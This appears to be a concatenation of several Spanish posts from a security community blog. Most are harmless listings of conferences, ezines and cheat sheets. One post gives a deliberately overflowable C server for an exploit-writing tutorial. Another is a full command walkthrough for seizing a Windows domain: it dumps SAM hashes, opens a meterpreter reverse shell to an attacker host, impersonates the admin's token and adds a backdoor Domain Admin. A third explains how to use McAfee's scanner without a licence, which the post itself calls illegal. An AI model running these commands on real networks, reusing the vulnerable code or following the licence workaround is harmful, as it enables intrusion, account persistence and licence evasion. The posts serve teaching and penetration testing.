En los siguientes videoturiales, aprenderemos de la mano de David Hoelzer, como crear un Exploit paso a paso y convertirlo en un modulo de Metasploit para después utilizarlo con este excelente framework; aunque los vídeos se encuentran en ingles, son bastante prácticos y visuales, con lo que no tendremos ningún problema al seguirlos.

El código utilizado en los vídeos fue:

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define PORT “7777″ // the port users will be connecting to

#define BACKLOG 10 // how many pending connections queue will hold

void vulnerable(char *net_buffer)
{
char local_buffer[120];
strcpy(local_buffer, net_buffer);
return;
}

void sigchld_handler(int s)
{
while(waitpid(-1, NULL, WNOHANG) > 0);
}

// get sockaddr, IPv4 or IPv6:
void *get_in_addr(struct sockaddr *sa)
{
if (sa->sa_family == AF_INET) {
return &(((struct sockaddr_in*)sa)->sin_addr);
}

return &(((struct sockaddr_in6*)sa)->sin6_addr);
}

int main(void)
{
int sockfd, new_fd; // listen on sock_fd, new connection on new_fd
struct addrinfo hints, *servinfo, *p;
struct sockaddr_storage their_addr; // connector’s address information
socklen_t sin_size;
struct sigaction sa;
int yes=1;
char in_buffer[20], out_buffer[20], net_buffer[2048];
char s[INET6_ADDRSTRLEN];
int rv;

memset(&hints, 0, sizeof hints);
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = AI_PASSIVE; // use my IP

if ((rv = getaddrinfo(NULL, PORT, &hints, &servinfo)) != 0) {
fprintf(stderr, “getaddrinfo: %s\n”, gai_strerror(rv));
return 1;
}

// loop through all the results and bind to the first we can
for(p = servinfo; p != NULL; p = p->ai_next) {
if ((sockfd = socket(p->ai_family, p->ai_socktype,
p->ai_protocol)) == -1) {
perror(“server: socket”);
continue;
}

if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes,
sizeof(int)) == -1) {
perror(“setsockopt”);
exit(1);
}

if (bind(sockfd, p->ai_addr, p->ai_addrlen) == -1) {
close(sockfd);
perror(“server: bind”);
continue;
}

break;
}

if (p == NULL) {
fprintf(stderr, “server: failed to bind\n”);
return 2;
}

freeaddrinfo(servinfo); // all done with this structure

if (listen(sockfd, BACKLOG) == -1) {
perror(“listen”);
exit(1);
}

sa.sa_handler = sigchld_handler; // reap all dead processes
sigemptyset(&sa.sa_mask);
sa.sa_flags = SA_RESTART;
if (sigaction(SIGCHLD, &sa, NULL) == -1) {
perror(“sigaction”);
exit(1);
}

printf(“server: waiting for connections…\n”);

while(1) { // main accept() loop
sin_size = sizeof their_addr;
new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
if (new_fd == -1) {
perror(“accept”);
continue;
}

inet_ntop(their_addr.ss_family,
get_in_addr((struct sockaddr *)&their_addr),
s, sizeof s);
printf(“server: got connection from %s\n”, s);

if (!fork()) { // this is the child process
close(sockfd); // child doesn’t need the listener
memset(net_buffer, 0, 1024);
strcpy(out_buffer, “HELO\nCOMMAND:”);
if (send(new_fd, out_buffer, strlen(out_buffer), 0) == -1)
perror(“send”);
if (recv(new_fd, net_buffer, 1024, 0))
{
vulnerable(net_buffer);
strcpy(out_buffer, “RECV: “);
strcat(out_buffer, net_buffer);
send(new_fd, out_buffer, strlen(out_buffer), 0);
}
close(new_fd);
exit(0);
}
close(new_fd); // parent doesn’t need this
}

return 0;
}

También puede interesarte...

• Vídeo: Introducción al Metasploit Framework
• Vídeo Tutorial de IPTables
• Video Tutorial, Cómo descargar y editar archivos Flash (SWF)
• Video: Explotando WM Downloader
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Metasploit Framework 3.3.2
• Desbloquear iPod Touch 2G Fácilmente
• Metasploit Framework 3.2 Portable para Windows

Sin mas preámbulos, los dejos con las memorias del DISI 2009

Inauguración DISI 2009
D. José Manuel Perales, D. Ramón Capellades, D. César Sanz, D. Jorge Ramió

Duración: 07:28 minutos

Conferencia Inaugural. Hashing Aleatorio: Firmas Digitales Seguras sin Resistencia a Colisiones
D. Hugo Krawczyk, IBM Research – Estados Unidos

Duración: 01:10:19 horas, Las diapositivas puedes descargarlas de aquí.

Coloquio Tendencias en Malware
D. José Bidot Director de Segurmática Cuba, D. Ero Carrera Chief Research Officer Collaborative Security VirusTotal España y D. Emilio Castellote Director de Marketing de Panda Security España. Modera D. Justo Carracedo Catedrático de la EUITT-UPM

Duración: 01:20:50 horas, Puedes descargar diapositivas de D . José Bidot (aqui) y las Diapositivas de D . Ero Carrera (aqui).

Coloquio Mitos y Realidades en Hacking
D. Luis Guillermo Castañeda Director de Servicios Profesionales de Rusoft México, D. Chema Alonso Consultor de Seguridad de Informática64 España, D. Alejandro Ramos Manager de TigerTeam en SIA España y D. Rubén Santamarta Consultor Técnico Independiente España. Modera D. Daniel Calzada Profesor Titular de la EUI-UPM

Duración: 01:46:57 horas, Puedes descargar las Diapositivas de D . Luis Guillermo Castañeda (aquí), y las Diapositivas de D . Chema Alonso (aquí)

Clausura DISI 2009
D. Justo Carracedo, Dña. Gemma Déler, D. Jorge Ramió

Duración: 06:15 minutos

Si quieres descargar los vídeos de estas charlas puedes instalar el plugin para Mozilla Firefox Video DownloadHelper.

Para mas información visita la página oficial del evento, donde encontraras también las Ponencias del DISI 2006, las del DISI 2007. y las ponencias del DISI 2008.

También puede interesarte...

• Memorias del DISI 2008
• El futuro de la industria de la Seguridad Informática
• Kevin Mitnick – The Art Of Deception – Video Conferencia
• 1st Security Blogger Summit
• Video: Explotando WM Downloader
• ¿Dónde estudiar seguridad informática en Colombia?
• Vídeo: Introducción al Metasploit Framework
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)

Este libro reúne desde los conceptos más básicos a los más avanzados de la Seguridad Informática. En la segunda entrega se explican los diferentes protocolos que hacen posible la comunicación entre computadoras, el modelo OSI, el protocolo TCP/IP, ICMP, UDP y ARP con el que se finaliza realizando un laboratorio practico.

Descargar Capitulo 2 de “El Atacante Informático”

Capítulos Publicados:

• El Atacante Informático – Capitulo 1
• El Atacante Informático – Capítulo 2

Para Mas Información:
IT Forensic

También puede interesarte...

• La arquitectura de seguridad OSI
• Descarga Gratis el Libro de Una al Día
• (IN)SECURE Magazine Edición 21
• Cárcel y Multas para Delitos Informáticos en Colombia
• Libro: Redes Inalámbricas en los Países en Desarrollo
• Aspectos Avanzados de Seguridad en Redes
• Skipfish, el escáner de Google para seguridad de aplicaciones web
• Memorias del DISI 2009

La esteganografía se puede definir como la ocultación de información en un canal encubierto con el propósito de prevenir la detección de un mensaje oculto. En este articulo, se dan a conocer las técnicas en que se basa la estenografía, sus aplicaciones y diferencias frente a la criptografía.

Si deseas descargar el articulo en PDF, puedes hacerlo con el siguiente enlace “La esteganografía, el arte de ocultar información”.

Mas Información:
Pagina oficial de INTECO
Articulo “Esteganografía, el arte de ocultar información”

También puede interesarte...

• ¿Cómo Configurar la Privacidad en las Redes Sociales?
• Taxonomía de un Ataque con Backtrack 4
• La arquitectura de seguridad OSI
• ¿Como Eliminar la Contraseña de un PDF?
• OWASP.TV, videos en línea de las conferencias OWASP
• La mejor presentación de Seguridad en Aplicaciones Web
• OpenStego, solución libre para esteganografía
• Proyecto libre StegSecret – Herramientas libres para estegoanálisis

Aun así, cada que publicamos un nuevo numero de nuestra ezine, muchas personas preguntan donde descargar los demás números y nos comentan que desconocían totalmente el proyecto, para  todas estas personas que desconocen la revista de nuestra comunidad, les dejo los 4 números que hemos publicado hasta el momento para que los visualicen desde su navegador o los descarguen según sus gustos.

Ezine #1 BETA de La Comunidad DragonJAR

E-zine #2 Comunidad DragonJAR

E-zine #3 Comunidad DragonJAR

E-zine #4 Comunidad DragonJAR

Este año con la ayuda de Seifreed esperamos aumentar la periodicidad con la que publicamos estos números y la calidad de los artículos contenidos en cada uno de ellos, si quieres participar de alguna forma con nuestra revista digital visita este enlace.

También puede interesarte...

• Nuestros propósitos para el 2010
• Convocatoria para el próximo numero de DragonZineIT
• Nuestros propósitos para el 2009
• Ezine Phrack # 65
• Ezine #1 BETA de La Comunidad DragonJAR
• COMBAT Training v2.0 en Colombia
• Revista Electrónica El Derecho Informático
• Boletín de La Comunidad DragonJAR #0008

En esta primera edición de la revista, se tratan temas muy interesantes, todos relacionados con el derecho informático, algunos de los temas son:

• La sobre explotación en internet
• Control de contenidos en buscadores
• Otra visión de los Online Dispute Resolution (O.D.R)
• Una posible solución a todos los problemas de los argentinos
• El cambio permanente
• El tigre fogozo y la moza indiscreta
• marketing para abogados
• La seguridad y el Derecho, Hermanos sin relación
• Protección de datos personales en Argentina
• Entrevista al Dr Alexander Diaz Garcia

Felicitaciones todos aquellos que hicieron posible este primer número y esperamos que sigan mucho tiempo con esta iniciativa, ya que los temas de derecho informático y mas en nuestro idioma, son de gran ayuda para educar a todos los ciudadanos digitales que “nacen” a diario, desconociendo sus derechos en la red.

A continuaron te dejo el primero numero de la revista “El derecho Informático” para que la leas online (click en el centro de la revista,  para ver la revista en pantalla completa)

Si deseas descargarla en formato PDF, puedes hacerlo desde este enlace.

También puede interesarte...

• Ezine Comunidad DragonJAR Online
• Como Recuperar Clave MySQL
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)
• TestDisk – Recupera tus Particiones y Archivos
• E-zine #4 Comunidad DragonJAR
• Phrack Magazine # 66
• Convocatoria para el próximo numero de DragonZineIT
• Sin SSL ¿Y Ahora Quien Podrá Defendernos?

Pero no importa si le llamas pastel, chancuco, (en colombia las mas utilizadas) o chuletas (muy común en españa) a ese trozo de papel, lápiz, piel, etc…, lo importante es la función que cumplen al “recordarnos” los aspectos claves de los temas que estamos tratando.

En el campo de la seguridad informática es normal contar con mas de una docena de herramientas y técnicas para realizar un test de penetración o testear la seguridad de un  aplicativo o red, es por eso que en este campo, en el que tenemos que recordar tantas cosas, son especialmente útiles estas “ayudas didácticas”, en este articulo pretendo recopilar el mayor numero de “chuletas” o “cheet sheets” de herramientas y técnicas relacionadas con la seguridad informática.

Técnicas:

XSS

• XSS Cheet Sheets
• Hoja de trucos XSS
• XSS – Exposed
• XSS, SQL Injection and Fuzzing Barcode Cheat Sheet
• Prevención del XSS
• xssDB

SQL Injection

• SQL Injection Cheat Sheet
• Informix SQL Injection Cheat Sheet
• MSSQL Injection Cheat Sheet
• Oracle SQL Injection Cheat Sheet
• MySQL SQL Injection Cheat Sheet
• Postgres SQL Injection Cheat Sheet
• DB2 SQL Injection Cheat Sheet
• Ingres SQL Injection Cheat Sheet
• SQL Injection Prevention Cheat Sheet

Search Engines Hacking

• Google Hacking
• Bing Hacking (I de III)
• Google Hacking Database

Cross-Site Request Forgery

• Cross-Site Request Forgery (CSRF) Prevention

Ingeniería Inversa

• X86 Win32 Reverse Engineering

Análisis Forense

• Análisis Forense Digital

Wireless Crack

• Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper
• WEP Cracking – Cheat Sheet

Herramientas

• Hping (español) (ingles)
• NMap (español) (ingles)
• Fgdump, Hping, Metasploit (ingles)
• Netcat (ingles)
• ESAPI (ingles)
• BackTrack 4 (ingles)

Procedimientos / Protocolos

• Intrusion Discovery Cheat Sheet (Linux) (Windows)
• IPv6 TCP/IP and tcpdump
• TCP/IP and tcpdump
• OWASP 2010 Top 10 Cheat Sheet
• Web Application Security Frame

Ayudanos a complementar este listado, enviamos las “chuletas”, “Pasteles”, “Cheat Sheets” (o como le llamen en tu pais), que conozcas sobre herramientas, técnicas o temas relacionados con la seguridad informática.

También puede interesarte...

• X.25 Conferencia de Seguridad Informática en Mexico
• Ciberterrorismo
• ¿Dónde estudiar seguridad informática en Colombia?
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• ¿Es suficiente la seguridad lógica en entornos de alta seguridad?
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• PentBox – Una suite de seguridad y pentesting en ruby
• Varias Distribuciones Live CD de Seguridad en un DVD

En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:

REQUISITOS

• Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
• Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
• Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
• Una copia de BackTrack 4

Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

• mount /dev/sda1 /mnt/sda1
  Montamos la particion de la maquina windows
• cd /mnt/sda1/WINDOWS/system32/config
  accedemos a la carpeta dodne se encuentra el archivo SAM
• samdump2 system SAM
  sacamos los hash de los usuarios en la maquina windows
• msfconsole
  ejecutamos el metasploit por consola
• use windows/smb/psexec
  utilizamos el psexec
• exploit -p windows/meterpreter/reverse_tcp -o
  utilizamos la shell meterpreter
• LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
  configuramos las opciones del exploit
• sessions -i 1
  una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
• use incognito
  utilizamos el modulo incognito de meterpreter
• list_tokens -u
  mostramos los tokens
• impersonate_token mydomain\\domainadmin
  tomamos las credenciales del administrador de dominio
• execute -f cmd.exe -i -t
  lanzamos la consola de windows
• net user hack MPass5678 /add /domain
  Agregamos el usuario “hack” con clave “MPass46782″ al dominio
• net group “Domain Admins” hack /add /domain
  metemos el usuario hack al grupo de administradores de dominio
• Ya hemos tomado el control del dominio de windows

Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de aprendizaje.

También puede interesarte...

• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Como realizar un borrado seguro usando BleachBit
• Video: Explotando WM Downloader
• Como Recuperar Clave MySQL
• Vídeo: Introducción al Metasploit Framework
• Metasploit Framework 3.3.2

Sin embargo, con el pasar del tiempo, hemos visto como los virus y antivirus han proliferado en la nube, volviéndose un negocio cada día mas importante!.

Durante mi trabajo en la empresa XYZ, fueron muchos los proveedores que nos llegaron con soluciones de antivirus, algunos de ellos con muy buen éxito en mis pruebas de virus, algunos otros exageradamente caros y malos!

Bueno, dejemos a un lado el parloteo, y vayamos al asunto, la idea de esta guía, es demostrar como algunas empresas de software disfrazan las famosas actualizaciones de firmas como si fuera un texto plano que se baja a una maquina, y donde figuran las firmas de virus conocidos!. En realidad se esta bajando todo un archivo ejecutable, es decir un binario, que en su interior contiene las dichosas firmas, y que usa un frontend o interfaz gráfica para ser mas amistoso con el usuario final pero que en realidad no es necesaria y solo consume recursos innecesarios.

En mi investigación, con la ayuda y experiencia del grupo de trabajo que tuve en la empresa XYZ, pudimos observar el simple funcionamiento de los archivos contenidos en este archivo de “actualización”, donde se incluye un completo escanner antivirus por consola, con el que podremos saltarnos las pesadas interfaces gráficas de los antivirus y eliminar todas las amenazas de nuestra maquina totalmente gratis.

Recordemos que este procedimiento no es legal, es decir que no debe realizarse a menos que se tenga un contrato de soporte técnico valido y licencias de antivirus validos con McAfee.

De aquí en adelante no me hago responsable si decide hacer un acto ilegal para limpiar su equipo de virus, pues este documento pretende ser solamente académico, para que el usuario que desee aprender un poco mas del mundo de los antivirus y su funcionamiento.

El primer paso es ingresar a esta pagina:

A  continuación  debes  descargar  el  sdat###.exe  los  #  son  números  que  varían según la versión del sdat.

Descargamos este archivo.

Después  de  descargar  el  archivo,  lo  movemos  a  una  carpeta  ya  que  hay  que descomprimirlo y extrae varios archivos

Muy bien llego la hora de descomprimirlo.

En  la  consola  (ventana  negra)  ir  hasta  donde  está  el  archivo  descargado (sdat####.exe) y ejecutar:

sdat####.exe     /E

Sin las comillas

Obteniendo la siguiente lista de archivos

Después de explorar un poco las opciones del archivo scan.exe, llego a la conclusión que solo es necesario ejecutarlo con los siguientes parámetros para hacer lo mismo que su contraparte con interface gráfica, pero sin los elevados consumos y sin “problemas” de licencia:

scan.exe /ADL /ALL /ANALYZE /CLEAN /DELETE /PROGRAM /SUB /UNZIP /PANALYZE /WINMEM /RPTERR /RPTCOR /RPTALL /report=c:\scan.txt

Esto ejecuta un escaneo de todo el equipo ELIMINANDO todas las infecciones generando un reporte en “c:\scan.txt”

Conclusiones:

Las   empresas   de   antivirus  deberían  mejorar   el   sistema   de  actualización  de   las firmas de antivirus.

Las empresas deberían verificar con pruebas de desempeño sus antivirus, y dejar de   tratar   el   tema   de   seguridad   y   rendimiento   en  términos  monetarios   y   mas   en términos de beneficios para la red.

Creo firmemente que esta técnica puede ser usada con otro antivirus, ¿alguien mas se anima a probar?

Este articulo fue escrito por Eduardo Restrepo para La Comunidad DragonJAR, tú también puedes enviar tus artículos para publicarlos en la comunidad, como ya lo hicieron Axiacamus, Anaxmon, Epsilon, 4v4t4r, Cortex, Cronopio, D7n0s4ur70, Laura JAR y SamuraiBlanco; Solo tienes que enviar tu articulo a dragon(arroba)dragonjar.org.

También puede interesarte...

• Avira Premium Security Suite Gratis
• Licencia para Avira AntiVir Premium en Español Gratis
• Licencia Gratis del Panda Internet Security
• Descargar Ashampoo WinOptimizer Gratis
• Descargar Ultima Versión del Nero Gratis
• Descargar Windows 7 Release Candidate 1
• Descargar Gratis Internet Explorer 8 Final
• Los Antivirus Gratuitos Reaccionan Mas Rápido

También puede interesarte...

• Ciber Guerrillas – Documental sobre las Guerras Cibernéticas
• Pastel, Cheet Sheets, Chuletas en la Seguridad Informática
• X.25 Conferencia de Seguridad Informática en Mexico
• ¿Dónde estudiar seguridad informática en Colombia?
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• ¿Es suficiente la seguridad lógica en entornos de alta seguridad?
• Tercer Encuentro Internacional de Seguridad Informática – Día I
• Katana – Múltiples Distribuciones de Seguridad en tu USB